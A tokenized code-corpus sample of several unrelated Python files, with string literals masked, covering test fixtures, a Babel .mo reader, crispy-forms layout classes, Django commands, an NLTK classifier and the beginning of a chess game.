<s> import functools <EOL> import operator <EOL> import os <EOL> import shutil <EOL> import sys <EOL> import py <EOL> import pytest <EOL> import rasterio <EOL> if sys . version_info > ( <NUM_LIT:3> , ) : <EOL> reduce = functools . reduce <EOL> test_files = [ <EOL> os . path . join ( os . path . dirname ( __file__ ) , p ) for p in [ '<STR_LIT>' ] ] <EOL> def pytest_cmdline_main ( config ) : <EOL> if reduce ( operator . and_ , map ( os . path . exists , test_files ) ) : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def data ( ) : <EOL> """<STR_LIT>""" <EOL> tmpdir = py . test . ensuretemp ( '<STR_LIT>' ) <EOL> for filename in test_files : <EOL> shutil . copy ( filename , str ( tmpdir ) ) <EOL> return tmpdir </s>
<s> assert_has_feature ( <EOL> <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : <NUM_LIT> } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : <NUM_LIT> } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : <NUM_LIT> } ) </s>
<s> assert_has_feature ( <EOL> <NUM_LIT:8> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) </s>
<s> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) </s>
<s> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:id>" : <NUM_LIT> } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:id>" : <NUM_LIT> } ) </s>
<s> from __future__ import absolute_import <EOL> import collections <EOL> import importlib <EOL> import shlex <EOL> import subprocess <EOL> import os <EOL> import os . path <EOL> import re <EOL> from . utils import logging , exe_exist <EOL> class Meta ( type ) : <EOL> def __init__ ( cls , name , bases , attrs ) : <EOL> if name not in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> SyntaxChecker . registry [ cls . __filetype__ ] [ cls . checker ] = cls <EOL> return super ( Meta , cls ) . __init__ ( name , bases , attrs ) <EOL> Base = Meta ( "<STR_LIT>" , ( object , ) , { } ) <EOL> class SyntaxChecker ( Base ) : <EOL> registry = collections . defaultdict ( dict ) <EOL> errorformat = None <EOL> checker = None <EOL> args = '<STR_LIT>' <EOL> _regex_map = { } <EOL> def __getitem__ ( self , ft ) : <EOL> return self . registry . get ( ft , { } ) <EOL> def __contains__ ( self , ft ) : <EOL> return ft in self . registry <EOL> @ classmethod <EOL> def parse_loclist ( cls , loclist , bufnr ) : <EOL> if cls . checker not in cls . _regex_map : <EOL> cls . _regex_map [ cls . checker ] = re . compile ( cls . regex , re . VERBOSE ) <EOL> lists = [ ] <EOL> for i , l in enumerate ( loclist ) : <EOL> g = cls . _regex_map [ cls . checker ] . match ( l ) <EOL> if not g : <EOL> continue <EOL> loc = g . groupdict ( ) <EOL> loc . update ( { <EOL> "<STR_LIT>" : i + <NUM_LIT:1> , <EOL> "<STR_LIT>" : bufnr , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:type>" : '<STR_LIT>' if loc [ "<STR_LIT>" ] else '<STR_LIT:E>' <EOL> } ) <EOL> lists . append ( loc ) <EOL> return lists <EOL> @ classmethod <EOL> def gen_loclist ( cls , fpath , bufnr ) : <EOL> if not cls . filter_file ( fpath ) : <EOL> return [ ] <EOL> if not exe_exist ( cls . checker ) : <EOL> logging . warn ( "<STR_LIT>" . format ( cls . checker ) ) <EOL> return [ ] <EOL> if not os . path . exists ( fpath ) : <EOL> logging . warn ( "<STR_LIT>" . format ( fpath ) ) <EOL> return [ ] <EOL> cmd_args = shlex . split ( cls . cmd ( os . path . 
basename ( fpath ) ) ) <EOL> res = subprocess . Popen ( cmd_args , cwd = os . path . dirname ( fpath ) , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE , <EOL> close_fds = True ) <EOL> out = res . communicate ( ) <EOL> err_lines = '<STR_LIT:\n>' . join ( out ) . strip ( ) . replace ( '<STR_LIT:\r>' , '<STR_LIT>' ) . split ( '<STR_LIT:\n>' ) <EOL> loclists = cls . parse_loclist ( err_lines , bufnr ) <EOL> return loclists <EOL> @ classmethod <EOL> def filter_file ( cls , fpath ) : <EOL> return True <EOL> @ classmethod <EOL> def cmd ( cls , fname ) : <EOL> return "<STR_LIT>" . format ( cls . checker , cls . args , fname ) <EOL> checker_manager = SyntaxChecker ( ) <EOL> def load_checkers ( ft ) : <EOL> if ft not in checker_manager : <EOL> try : <EOL> importlib . import_module ( "<STR_LIT>" . format ( ft ) ) <EOL> except ImportError : <EOL> return { } <EOL> return checker_manager [ ft ] </s>
<s> """<STR_LIT>""" <EOL> import array <EOL> import struct <EOL> from babel . messages . catalog import Catalog , Message <EOL> from babel . _compat import range_type , array_tobytes <EOL> LE_MAGIC = <NUM_LIT> <EOL> BE_MAGIC = <NUM_LIT> <EOL> def read_mo ( fileobj ) : <EOL> """<STR_LIT>""" <EOL> catalog = Catalog ( ) <EOL> headers = { } <EOL> filename = getattr ( fileobj , '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> buf = fileobj . read ( ) <EOL> buflen = len ( buf ) <EOL> unpack = struct . unpack <EOL> magic = unpack ( '<STR_LIT>' , buf [ : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> if magic == LE_MAGIC : <EOL> version , msgcount , origidx , transidx = unpack ( '<STR_LIT>' , buf [ <NUM_LIT:4> : <NUM_LIT:20> ] ) <EOL> ii = '<STR_LIT>' <EOL> elif magic == BE_MAGIC : <EOL> version , msgcount , origidx , transidx = unpack ( '<STR_LIT>' , buf [ <NUM_LIT:4> : <NUM_LIT:20> ] ) <EOL> ii = '<STR_LIT>' <EOL> else : <EOL> raise IOError ( <NUM_LIT:0> , '<STR_LIT>' , filename ) <EOL> for i in range_type ( <NUM_LIT:0> , msgcount ) : <EOL> mlen , moff = unpack ( ii , buf [ origidx : origidx + <NUM_LIT:8> ] ) <EOL> mend = moff + mlen <EOL> tlen , toff = unpack ( ii , buf [ transidx : transidx + <NUM_LIT:8> ] ) <EOL> tend = toff + tlen <EOL> if mend < buflen and tend < buflen : <EOL> msg = buf [ moff : mend ] <EOL> tmsg = buf [ toff : tend ] <EOL> else : <EOL> raise IOError ( <NUM_LIT:0> , '<STR_LIT>' , filename ) <EOL> if mlen == <NUM_LIT:0> : <EOL> lastkey = key = None <EOL> for item in tmsg . splitlines ( ) : <EOL> item = item . strip ( ) <EOL> if not item : <EOL> continue <EOL> if b'<STR_LIT::>' in item : <EOL> key , value = item . split ( b'<STR_LIT::>' , <NUM_LIT:1> ) <EOL> lastkey = key = key . strip ( ) . lower ( ) <EOL> headers [ key ] = value . strip ( ) <EOL> elif lastkey : <EOL> headers [ lastkey ] += b'<STR_LIT:\n>' + item <EOL> if b'<STR_LIT>' in msg : <EOL> ctxt , msg = msg . 
split ( b'<STR_LIT>' ) <EOL> else : <EOL> ctxt = None <EOL> if b'<STR_LIT:\x00>' in msg : <EOL> msg = msg . split ( b'<STR_LIT:\x00>' ) <EOL> tmsg = tmsg . split ( b'<STR_LIT:\x00>' ) <EOL> if catalog . charset : <EOL> msg = [ x . decode ( catalog . charset ) for x in msg ] <EOL> tmsg = [ x . decode ( catalog . charset ) for x in tmsg ] <EOL> else : <EOL> if catalog . charset : <EOL> msg = msg . decode ( catalog . charset ) <EOL> tmsg = tmsg . decode ( catalog . charset ) <EOL> catalog [ msg ] = Message ( msg , tmsg , context = ctxt ) <EOL> origidx += <NUM_LIT:8> <EOL> transidx += <NUM_LIT:8> <EOL> catalog . mime_headers = headers . items ( ) <EOL> return catalog <EOL> def write_mo ( fileobj , catalog , use_fuzzy = False ) : <EOL> """<STR_LIT>""" <EOL> messages = list ( catalog ) <EOL> if not use_fuzzy : <EOL> messages [ <NUM_LIT:1> : ] = [ m for m in messages [ <NUM_LIT:1> : ] if not m . fuzzy ] <EOL> messages . sort ( ) <EOL> ids = strs = b'<STR_LIT>' <EOL> offsets = [ ] <EOL> for message in messages : <EOL> if message . pluralizable : <EOL> msgid = b'<STR_LIT:\x00>' . join ( [ <EOL> msgid . encode ( catalog . charset ) for msgid in message . id <EOL> ] ) <EOL> msgstrs = [ ] <EOL> for idx , string in enumerate ( message . string ) : <EOL> if not string : <EOL> msgstrs . append ( message . id [ min ( int ( idx ) , <NUM_LIT:1> ) ] ) <EOL> else : <EOL> msgstrs . append ( string ) <EOL> msgstr = b'<STR_LIT:\x00>' . join ( [ <EOL> msgstr . encode ( catalog . charset ) for msgstr in msgstrs <EOL> ] ) <EOL> else : <EOL> msgid = message . id . encode ( catalog . charset ) <EOL> if not message . string : <EOL> msgstr = message . id . encode ( catalog . charset ) <EOL> else : <EOL> msgstr = message . string . encode ( catalog . charset ) <EOL> if message . context : <EOL> msgid = b'<STR_LIT>' . join ( [ message . context . encode ( catalog . charset ) , <EOL> msgid ] ) <EOL> offsets . 
append ( ( len ( ids ) , len ( msgid ) , len ( strs ) , len ( msgstr ) ) ) <EOL> ids += msgid + b'<STR_LIT:\x00>' <EOL> strs += msgstr + b'<STR_LIT:\x00>' <EOL> keystart = <NUM_LIT:7> * <NUM_LIT:4> + <NUM_LIT:16> * len ( messages ) <EOL> valuestart = keystart + len ( ids ) <EOL> koffsets = [ ] <EOL> voffsets = [ ] <EOL> for o1 , l1 , o2 , l2 in offsets : <EOL> koffsets += [ l1 , o1 + keystart ] <EOL> voffsets += [ l2 , o2 + valuestart ] <EOL> offsets = koffsets + voffsets <EOL> fileobj . write ( struct . pack ( '<STR_LIT>' , <EOL> LE_MAGIC , <EOL> <NUM_LIT:0> , <EOL> len ( messages ) , <EOL> <NUM_LIT:7> * <NUM_LIT:4> , <EOL> <NUM_LIT:7> * <NUM_LIT:4> + len ( messages ) * <NUM_LIT:8> , <EOL> <NUM_LIT:0> , <NUM_LIT:0> <EOL> ) + array_tobytes ( array . array ( "<STR_LIT:i>" , offsets ) ) + ids + strs ) </s>
<s> from __future__ import unicode_literals <EOL> from random import randint <EOL> from django . template import Template <EOL> from django . template . loader import render_to_string <EOL> from django . template . defaultfilters import slugify <EOL> from . compatibility import text_type <EOL> from . layout import LayoutObject , Field , Div <EOL> from . utils import render_field , flatatt , TEMPLATE_PACK <EOL> class PrependedAppendedText ( Field ) : <EOL> template = "<STR_LIT>" <EOL> def __init__ ( self , field , prepended_text = None , appended_text = None , * args , ** kwargs ) : <EOL> self . field = field <EOL> self . appended_text = appended_text <EOL> self . prepended_text = prepended_text <EOL> if '<STR_LIT>' in kwargs : <EOL> self . active = kwargs . pop ( '<STR_LIT>' ) <EOL> self . input_size = None <EOL> css_class = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in css_class : <EOL> self . input_size = '<STR_LIT>' <EOL> if '<STR_LIT>' in css_class : <EOL> self . input_size = '<STR_LIT>' <EOL> super ( PrependedAppendedText , self ) . __init__ ( field , * args , ** kwargs ) <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , extra_context = None , ** kwargs ) : <EOL> extra_context = { <EOL> '<STR_LIT>' : self . appended_text , <EOL> '<STR_LIT>' : self . prepended_text , <EOL> '<STR_LIT>' : self . input_size , <EOL> '<STR_LIT>' : getattr ( self , "<STR_LIT>" , False ) <EOL> } <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> extra_context [ '<STR_LIT>' ] = self . wrapper_class <EOL> template = self . get_template_name ( template_pack ) <EOL> return render_field ( <EOL> self . field , form , form_style , context , <EOL> template = template , attrs = self . attrs , <EOL> template_pack = template_pack , extra_context = extra_context , ** kwargs <EOL> ) <EOL> class AppendedText ( PrependedAppendedText ) : <EOL> def __init__ ( self , field , text , * args , ** kwargs ) : <EOL> kwargs . 
pop ( '<STR_LIT>' , None ) <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> self . text = text <EOL> super ( AppendedText , self ) . __init__ ( field , appended_text = text , ** kwargs ) <EOL> class PrependedText ( PrependedAppendedText ) : <EOL> def __init__ ( self , field , text , * args , ** kwargs ) : <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> self . text = text <EOL> super ( PrependedText , self ) . __init__ ( field , prepended_text = text , ** kwargs ) <EOL> class FormActions ( LayoutObject ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def __init__ ( self , * fields , ** kwargs ) : <EOL> self . fields = list ( fields ) <EOL> self . template = kwargs . pop ( '<STR_LIT>' , self . template ) <EOL> self . attrs = kwargs <EOL> if '<STR_LIT>' in self . attrs : <EOL> self . attrs [ '<STR_LIT:class>' ] = self . attrs . pop ( '<STR_LIT>' ) <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> html = self . get_rendered_fields ( form , form_style , context , template_pack , ** kwargs ) <EOL> template = self . get_template_name ( template_pack ) <EOL> context . update ( { <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT>' : html <EOL> } ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> def flat_attrs ( self ) : <EOL> return flatatt ( self . attrs ) <EOL> class InlineCheckboxes ( Field ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> return super ( InlineCheckboxes , self ) . 
render ( <EOL> form , form_style , context , template_pack = template_pack , <EOL> extra_context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> class InlineRadios ( Field ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> return super ( InlineRadios , self ) . render ( <EOL> form , form_style , context , template_pack = template_pack , <EOL> extra_context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> class FieldWithButtons ( Div ) : <EOL> template = '<STR_LIT>' <EOL> field_template = '<STR_LIT>' <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , extra_context = None , ** kwargs ) : <EOL> field_template = self . field_template % template_pack <EOL> buttons = '<STR_LIT>' . join ( <EOL> render_field ( <EOL> field , form , form_style , context , <EOL> field_template , layout_object = self , <EOL> template_pack = template_pack , ** kwargs <EOL> ) for field in self . fields [ <NUM_LIT:1> : ] <EOL> ) <EOL> extra_context = { '<STR_LIT>' : self , '<STR_LIT>' : buttons } <EOL> template = self . get_template_name ( template_pack ) <EOL> if isinstance ( self . fields [ <NUM_LIT:0> ] , Field ) : <EOL> return render_field ( <EOL> self . fields [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , form , form_style , context , <EOL> template , attrs = self . fields [ <NUM_LIT:0> ] . attrs , <EOL> template_pack = template_pack , extra_context = extra_context , ** kwargs <EOL> ) <EOL> else : <EOL> return render_field ( <EOL> self . fields [ <NUM_LIT:0> ] , form , form_style , context , template , <EOL> extra_context = extra_context , ** kwargs <EOL> ) <EOL> class StrictButton ( object ) : <EOL> """<STR_LIT>""" <EOL> template = '<STR_LIT>' <EOL> field_classes = '<STR_LIT>' <EOL> def __init__ ( self , content , ** kwargs ) : <EOL> self . content = content <EOL> self . template = kwargs . pop ( '<STR_LIT>' , self . template ) <EOL> kwargs . 
setdefault ( '<STR_LIT:type>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs : <EOL> kwargs [ '<STR_LIT:id>' ] = kwargs . pop ( '<STR_LIT>' ) <EOL> kwargs [ '<STR_LIT:class>' ] = self . field_classes <EOL> if '<STR_LIT>' in kwargs : <EOL> kwargs [ '<STR_LIT:class>' ] += "<STR_LIT>" % kwargs . pop ( '<STR_LIT>' ) <EOL> self . flat_attrs = flatatt ( kwargs ) <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> self . content = Template ( text_type ( self . content ) ) . render ( context ) <EOL> template = self . template % template_pack <EOL> context . update ( { '<STR_LIT>' : self } ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> class Container ( Div ) : <EOL> """<STR_LIT>""" <EOL> css_class = "<STR_LIT>" <EOL> def __init__ ( self , name , * fields , ** kwargs ) : <EOL> super ( Container , self ) . __init__ ( * fields , ** kwargs ) <EOL> self . template = kwargs . pop ( '<STR_LIT>' , self . template ) <EOL> self . name = name <EOL> self . _active_originally_included = "<STR_LIT>" in kwargs <EOL> self . active = kwargs . pop ( "<STR_LIT>" , False ) <EOL> if not self . css_id : <EOL> self . css_id = slugify ( self . name ) <EOL> def __contains__ ( self , field_name ) : <EOL> """<STR_LIT>""" <EOL> return field_name in map ( lambda pointer : pointer [ <NUM_LIT:1> ] , self . get_field_names ( ) ) <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> if self . active : <EOL> if not '<STR_LIT>' in self . css_class : <EOL> self . css_class += '<STR_LIT>' <EOL> else : <EOL> self . css_class = self . css_class . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return super ( Container , self ) . render ( form , form_style , context , template_pack ) <EOL> class ContainerHolder ( Div ) : <EOL> """<STR_LIT>""" <EOL> def first_container_with_errors ( self , errors ) : <EOL> """<STR_LIT>""" <EOL> for tab in self . 
fields : <EOL> errors_here = any ( error in tab for error in errors ) <EOL> if errors_here : <EOL> return tab <EOL> return None <EOL> def open_target_group_for_form ( self , form ) : <EOL> """<STR_LIT>""" <EOL> target = self . first_container_with_errors ( form . errors . keys ( ) ) <EOL> if target is None : <EOL> target = self . fields [ <NUM_LIT:0> ] <EOL> if not target . _active_originally_included : <EOL> target . active = True <EOL> return target <EOL> target . active = True <EOL> return target <EOL> class Tab ( Container ) : <EOL> """<STR_LIT>""" <EOL> css_class = '<STR_LIT>' <EOL> link_template = '<STR_LIT>' <EOL> def render_link ( self , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> link_template = self . link_template % template_pack <EOL> return render_to_string ( link_template , { '<STR_LIT>' : self } ) <EOL> class TabHolder ( ContainerHolder ) : <EOL> """<STR_LIT>""" <EOL> template = '<STR_LIT>' <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> for tab in self . fields : <EOL> tab . active = False <EOL> self . open_target_group_for_form ( form ) <EOL> content = self . get_rendered_fields ( form , form_style , context , template_pack ) <EOL> links = '<STR_LIT>' . join ( tab . render_link ( template_pack ) for tab in self . fields ) <EOL> context . update ( { <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT>' : links , <EOL> '<STR_LIT:content>' : content <EOL> } ) <EOL> template = self . get_template_name ( template_pack ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> class AccordionGroup ( Container ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> data_parent = "<STR_LIT>" <EOL> class Accordion ( ContainerHolder ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> content = '<STR_LIT>' <EOL> if not self . css_id : <EOL> self . 
css_id = "<STR_LIT:->" . join ( [ "<STR_LIT>" , text_type ( randint ( <NUM_LIT:1000> , <NUM_LIT> ) ) ] ) <EOL> self . open_target_group_for_form ( form ) <EOL> for group in self . fields : <EOL> group . data_parent = self . css_id <EOL> content += render_field ( <EOL> group , form , form_style , context , template_pack = template_pack , ** kwargs <EOL> ) <EOL> template = self . get_template_name ( template_pack ) <EOL> context . update ( { '<STR_LIT>' : self , '<STR_LIT:content>' : content } ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> class Alert ( Div ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> css_class = "<STR_LIT>" <EOL> def __init__ ( self , content , dismiss = True , block = False , ** kwargs ) : <EOL> fields = [ ] <EOL> if block : <EOL> self . css_class += '<STR_LIT>' <EOL> Div . __init__ ( self , * fields , ** kwargs ) <EOL> self . template = kwargs . pop ( '<STR_LIT>' , self . template ) <EOL> self . content = content <EOL> self . dismiss = dismiss <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> template = self . get_template_name ( template_pack ) <EOL> context . update ( { '<STR_LIT>' : self , '<STR_LIT:content>' : self . content , '<STR_LIT>' : self . dismiss } ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> class UneditableField ( Field ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def __init__ ( self , field , * args , ** kwargs ) : <EOL> self . attrs = { '<STR_LIT:class>' : '<STR_LIT>' } <EOL> super ( UneditableField , self ) . __init__ ( field , * args , ** kwargs ) <EOL> class InlineField ( Field ) : <EOL> template = "<STR_LIT>" </s>
<s> import sys , os <EOL> import imp <EOL> from optparse import make_option <EOL> from django . conf import settings <EOL> from django . utils . importlib import import_module <EOL> from django . core . management import call_command <EOL> from django . core . management import BaseCommand <EOL> from django . db import connections <EOL> def import_app ( app_label , verbosity ) : <EOL> try : <EOL> app_path = __import__ ( app_label , { } , { } , [ app_label . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] ] ) . __path__ <EOL> except AttributeError : <EOL> return <EOL> except ImportError : <EOL> print "<STR_LIT>" % app_label <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> imp . find_module ( '<STR_LIT>' , app_path ) <EOL> except ImportError : <EOL> return <EOL> if verbosity >= <NUM_LIT:1> : <EOL> sys . stderr . write ( '<STR_LIT>' % app_label ) <EOL> generator = import_module ( '<STR_LIT>' , app_label ) <EOL> class Command ( BaseCommand ) : <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( "<STR_LIT>" , action = '<STR_LIT:store_true>' , dest = "<STR_LIT>" , default = False , <EOL> help = "<STR_LIT>" ) , <EOL> ) <EOL> help = '<STR_LIT>' <EOL> args = '<STR_LIT>' <EOL> def handle ( self , * app_labels , ** options ) : <EOL> verbosity = int ( options . pop ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> fixture = options . pop ( '<STR_LIT>' ) <EOL> if len ( app_labels ) == <NUM_LIT:0> : <EOL> for app_label in settings . INSTALLED_APPS : <EOL> import_app ( app_label , verbosity ) <EOL> else : <EOL> for app_label in app_labels : <EOL> import_app ( app_label , verbosity ) <EOL> if fixture : <EOL> for alias in connections . _connections : <EOL> call_command ( "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ** dict ( options , verbosity = <NUM_LIT:0> , database = alias ) ) </s>
<s> from django . conf import settings <EOL> def get_consumer_credentials ( ) : <EOL> '''<STR_LIT>''' <EOL> return getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) , getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) , getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from docs import DocumentationGenerator <EOL> from django . shortcuts import render_to_response <EOL> from django . template . context import RequestContext <EOL> def documentation ( request , * args , ** kwargs ) : <EOL> docs = DocumentationGenerator ( ) . get_docs ( as_objects = True ) <EOL> return render_to_response ( "<STR_LIT>" , { '<STR_LIT>' : docs } , <EOL> context_instance = RequestContext ( request ) ) </s>
<s> from django . conf . urls . defaults import * <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT:index>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) </s>
<s> from nltk . classify import NaiveBayesClassifier <EOL> from nltk . corpus import movie_reviews , stopwords <EOL> from nltk . collocations import BigramCollocationFinder <EOL> from nltk . metrics import BigramAssocMeasures <EOL> from nltk . probability import FreqDist , ConditionalFreqDist <EOL> import gzip <EOL> import os <EOL> import pickle <EOL> import re <EOL> import nltk <EOL> POSITIVE = "<STR_LIT:4>" <EOL> NEGATIVE = "<STR_LIT:0>" <EOL> NEUTRAL = "<STR_LIT:2>" <EOL> mention_re = re . compile ( ur "<STR_LIT>" , re . UNICODE ) <EOL> url_re = re . compile ( ur "<STR_LIT>" , re . UNICODE ) <EOL> emoticon_re = re . compile ( ur "<STR_LIT>" , re . UNICODE ) <EOL> tokenizer = nltk . RegexpTokenizer ( r'<STR_LIT>' ) <EOL> def word_feats ( words ) : <EOL> return dict ( [ ( word , True ) for word in words ] ) <EOL> def words_in_tweet ( inputstr ) : <EOL> outputstr = inputstr <EOL> outputstr = mention_re . sub ( "<STR_LIT>" , outputstr ) <EOL> outputstr = url_re . sub ( "<STR_LIT>" , outputstr ) <EOL> outputstr = emoticon_re . sub ( "<STR_LIT>" , outputstr ) <EOL> outputstr = outputstr . lower ( ) <EOL> return tokenizer . tokenize ( outputstr ) <EOL> def save_classifier ( classifier ) : <EOL> fModel = open ( '<STR_LIT>' , "<STR_LIT:wb>" ) <EOL> pickle . dump ( classifier , fModel , <NUM_LIT:1> ) <EOL> fModel . close ( ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> def load_classifier ( ) : <EOL> os . system ( "<STR_LIT>" ) <EOL> fModel = open ( '<STR_LIT>' , "<STR_LIT:rb>" ) <EOL> classifier = pickle . load ( fModel ) <EOL> fModel . close ( ) <EOL> os . system ( "<STR_LIT>" ) <EOL> return classifier <EOL> def package_classifier ( to_pickle ) : <EOL> fp = gzip . open ( '<STR_LIT>' , '<STR_LIT:wb>' ) <EOL> pickle . dump ( to_pickle , fp , <NUM_LIT:1> ) <EOL> fp . close ( ) </s>
<s> from Board import Board <EOL> from Pawn import Pawn <EOL> from Rook import Rook <EOL> from King import King <EOL> from Queen import Queen <EOL> from Bishop import Bishop <EOL> from Knight import Knight <EOL> from Coordinate import Coordinate as C <EOL> from Move import Move <EOL> from Piece import Piece <EOL> from AI import AI <EOL> from InputParser import InputParser <EOL> import time <EOL> import random <EOL> import sys <EOL> WHITE = True <EOL> BLACK = False <EOL> def askForPlayerSide ( ) : <EOL> playerChoiceInput = input ( <EOL> "<STR_LIT>" ) . lower ( ) <EOL> if '<STR_LIT:w>' in playerChoiceInput : <EOL> print ( "<STR_LIT>" ) <EOL> return WHITE <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return BLACK <EOL> def askForDepthOfAI ( ) : <EOL> depthInput = <NUM_LIT:2> <EOL> try : <EOL> depthInput = int ( input ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> return depthInput <EOL> def printCommandOptions ( ) : <EOL> undoOption = '<STR_LIT>' <EOL> printLegalMovesOption = '<STR_LIT>' <EOL> randomMoveOption = '<STR_LIT>' <EOL> quitOption = '<STR_LIT>' <EOL> moveOption = '<STR_LIT>' <EOL> options = [ undoOption , printLegalMovesOption , randomMoveOption , <EOL> quitOption , moveOption , '<STR_LIT>' , ] <EOL> print ( '<STR_LIT:\n>' . join ( options ) ) <EOL> def printAllLegalMoves ( board , parser ) : <EOL> for move in parser . getLegalMovesWithShortNotation ( board . currentSide ) : <EOL> print ( move . notation ) <EOL> def getRandomMove ( board , parser ) : <EOL> legalMoves = board . getAllMovesLegal ( board . currentSide ) <EOL> randomMove = random . choice ( legalMoves ) <EOL> randomMove . notation = parser . notationForMove ( randomMove ) <EOL> return randomMove <EOL> def makeMove ( move , board ) : <EOL> 